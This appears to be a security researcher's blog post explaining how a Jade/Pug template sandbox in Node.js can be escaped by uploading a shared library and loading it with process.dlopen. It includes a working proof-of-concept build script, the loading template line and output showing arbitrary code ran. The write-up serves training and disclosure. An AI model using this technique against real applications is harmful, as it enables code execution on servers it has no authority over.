UPDATE #2: James Kettle had pointed out a far simpler Jade breakout a full year before I published this. I wish I saw that before embarking on my research... =/
Not long ago I was asked by a client to provide a short training on writing secure Node.js applications. As part of the class, I decided to build an intentionally-vulnerable Express application (under Node 4.x) that allowed insecure file uploads. In one scenario I created, the application was susceptible to a directory traversal vulnerability, allowing students to upload arbitrary Jade/Pug templates that the application would later execute. I'm not sure if this is a very common condition in Express applications, but it is plausible that it could show up in real-world apps.
Pug does allow server-side JavaScript execution from within templates, so when I was initially building this vulnerable application I assumed students would be able to immediately set up whatever backdoor they chose from within their malicious templates. However, I quickly realized I was mistaken! In fact, Pug sets up only a very limited scope/namespace for code to execute within. Most Node.js global variables are not available, and
require()
isn't available, making it very hard to get access to fun things like child_process.exec()
. The Jade developers have set themselves up a makeshift sandbox for this template code, which is great to see. Of course for someone like me, a sandbox doesn't look so much like a road block as it looks like a fun challenge. ;-) Clearly if a developer were to explicitly expose local variables to Pug when evaluating a template, and those local variables had dangerous methods or otherwise exposed important functionality, then an attacker might be able to leverage that application-specific capability from within Pug to escalate privileges. However, that's speculative at best and will vary from one app to the next, so it would be more interesting if there was a general purpose way to break out of Pug.
As basic reconnaissance, I began to enumerate the few global variables that are exposed in Pug. I started with a simple template and tested it from the command line:
$ echo '- for (var prop in global) { console.log(prop); }' > enumerate.jade
$ jade enumerate.jade
global
process
GLOBAL
root
Buffer
clearImmediate
clearInterval
clearTimeout
setImmediate
setInterval
setTimeout
console
rendered enumerate.html
Next, I began just printing out one object at a time to see a listing of methods and such, but it seemed like some pretty slim pickings. I'll spare you the excitement of how many methods and APIs I read about over the next hour or so. Yet even a blind dog finds a bone now and then, and finally I stumbled across an interesting method in the
process
object:...
_debugProcess: [Function: _debugProcess],
_debugPause: [Function: _debugPause],
_debugEnd: [Function: _debugEnd],
hrtime: [Function: hrtime],
dlopen: [Function: dlopen],
uptime: [Function: uptime],
memoryUsage: [Function: memoryUsage],
binding: [Function: binding],
...
That scratched a part of my brain that is firmly outside of Node.js land. Of course! This is a wrapper to
dlopen(3)
. Shared libraries (e.g. .so
files, or .dll
files on lesser operating systems) are code, and that is going to pique any hacker's interest. This method does not appear in the Node.js documentation, but it is definitely discussed around the webbernet in the context of Node.js, if you look for it. As it turns out, the Node.js wrapper to dlopen
expects shared libraries to be proper Node-formatted modules. These are just regular shared libraries with certain additional symbols defined, and to be honest, I haven't absorbed every detail with respect to what these modules look like. But suffice it to say, you can't just load up the libc shared library and call system(3)
to get your jollies, since Node's dlopen
will blow up once it realizes libc.so
isn't a proper Node module.
Of course we could use
dlopen
to load up any native Node module that is already installed as a dependency to the application. An attacker may need to know the full path to the pre-installed module, but one could guess that with a bit of knowledge of the standard install directories. That would afford an attacker access to any functionality provided by the module from within Pug, which could provide a stepping stone to arbitrary code execution. But once again, that's going to be installation/application-specific and isn't nearly as fun as a general purpose escalation.
Recall, however, that my intentionally vulnerable Express application allows file uploads! That's how I'm giving my students access to run Pug templates in the first place. So in this scenario, the attacker can just upload their own Node module as a separate file, containing whatever functionality they choose, and invoke it to gain access to that functionality within Pug code. The obvious way to do this would be to set up a proper Node build chain that creates a natively-compiled module. That seemed like a lot of work to me, so I came up with a short-cut. In order to load a module, Node needs to first call libc's
dlopen
. This function doesn't have nearly the pesky requirements that Node's module system does. What's more, libc (and Windows, for that matter) has the option to execute arbitrary code during the module load process. So before libc's dlopen
even returns (and allows Node to verify the module exports), we can execute any code we like. So this is how I compiled my proof-of-concept payload using a simple shell script:
#!/bin/sh
NAME=evil
echo "INFO: Temporarily writing a C source file to /tmp/${NAME}.c"
cat > /tmp/${NAME}.c <<END
#include <stdio.h>
#include <stdlib.h>
/* GCC-ism designating the onload function to execute when the library is loaded */
static void onload() __attribute__((constructor));
/* Should see evidence of successful execution on stdout and in /tmp. */
void onload()
{
printf("EVIL LIBRARY LOADED\n");
system("touch /tmp/hacked-by-evil-so");
}
END
echo "INFO: Now compiling the code as a shared library..."
gcc -c -fPIC /tmp/${NAME}.c -o ${NAME}.o\
&& gcc ${NAME}.o -shared -o lib${NAME}.so
echo "INFO: Cleaning up..."
rm ${NAME}.o /tmp/${NAME}.c
echo "INFO: Final output is lib${NAME}.so in the current directory."
To test it locally, I simply ran this script to create the binary, and ran a bit of Pug code to attempt to load it as a module:
$ ./make-evil-so.sh
INFO: Temporarily writing a C source file to /tmp/evil.c
INFO: Now compiling the code as a shared library...
INFO: Cleaning up...
INFO: Final output is libevil.so in the current directory.
$ echo "- process.dlopen('evil', './libevil.so')" > test.jade
$ jade test.jade
EVIL LIBRARY LOADED
/usr/local/lib/node_modules/jade/lib/runtime.js:240
throw err;
^
Error: test.jade:1
> 1| - process.dlopen('evil', './libevil.so')
2|
Module did not self-register.
at Error (native)
at eval (eval at (/usr/local/lib/node_modules/jade/lib/index.js:218:8), :11:9)
at eval (eval at (/usr/local/lib/node_modules/jade/lib/index.js:218:8), :13:22)
at res (/usr/local/lib/node_modules/jade/lib/index.js:219:38)
at renderFile (/usr/local/lib/node_modules/jade/bin/jade.js:270:40)
at /usr/local/lib/node_modules/jade/bin/jade.js:136:5
at Array.forEach (native)
at Object. (/usr/local/lib/node_modules/jade/bin/jade.js:135:9)
at Module._compile (module.js:409:26)
at Object.Module._extensions..js (module.js:416:10)
$ ls -la /tmp/*hack*
-rw-r--r-- 1 tim tim 0 Aug 26 19:23 /tmp/hacked-by-evil-so
As we expect, the library file fails to load as a true Node module, but the library's onload()
function clearly ran with code of our choosing. Needless to say, this worked like a charm against the vulnerable app I created for the students.
Summary
Clearly this attack was possible because I set up the vulnerable application to accept file uploads in an unsafe way, which gave students access to both execute Jade/Pug templates and to upload shared libraries to complete the escalation. This may be a fairly uncommon situation in practice. However, there are a few other corner cases where an attacker may be able to leverage a similar sequence of steps leading to code execution. For instance, if a Pug template was vulnerable to an
eval()
injection during server-side JavaScript execution, then that would give an attacker access to the sandboxed execution context without needing to upload any files. From there, an attacker may be able to do one of the following to break out of the sandbox:- Any objects explicitly exposed to Pug in local variables by the application's developer could be leveraged to perhaps escalate privileges within the application or operating system, depending on the functionality exposed
- Pre-installed native modules could be loaded up using
dlopen
, and any functionality in those could perhaps be used to escalate privileges - Under Windows, it may be possible to use
dlopen
with UNC paths to fetch a library payload from a remote server (I haven't tested this... would love to hear if others find it is possible!)
Finally, I just want to make clear that I don't really fault the Pug developers for allowing this to occur. The code execution restrictions they have implemented really should be seen as a best-effort security measure. It is proactive and they should be applauded for it. The restricted namespace will certainly make an attacker's life difficult in many situations, and we can't expect the Pug developers to know about every little undocumented feature in the Node.js API. With that said: Should the Pug folks find a way to block dlopen access? Yes, probably. There's no good reason to expose this to Pug code in the vast majority of applications, and if a developer really wanted it, they could expose it via local variables.
No comments:
Post a Comment